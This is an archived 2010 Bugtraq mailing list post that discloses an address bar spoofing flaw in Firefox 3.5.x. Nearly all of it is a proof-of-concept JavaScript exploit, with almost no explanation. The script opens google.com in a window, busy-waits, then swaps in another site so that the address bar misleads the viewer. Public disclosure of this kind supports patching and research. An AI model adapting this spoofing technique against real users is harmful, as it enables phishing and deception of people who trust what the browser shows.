lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20100721153500.14647.qmail@securityfocus.com>
Date: 21 Jul 2010 15:35:00 -0000
From: info@...uritylab.ir
To: bugtraq@...urityfocus.com
Subject: Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability

Spoof Code:

<script language="javascript">
function pause(pd)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < pd);
}
function Spoofing () {
win = window.open('http://www.google.com','new')
pause (3000)
win = window.open('http://www.Securitylab.ir','new')
}
</script>
<a href="javascript: Spoofing()">Click Here</a>

########################################################################
Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)
Original Advisory: http://Securitylab.ir/Advisories

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ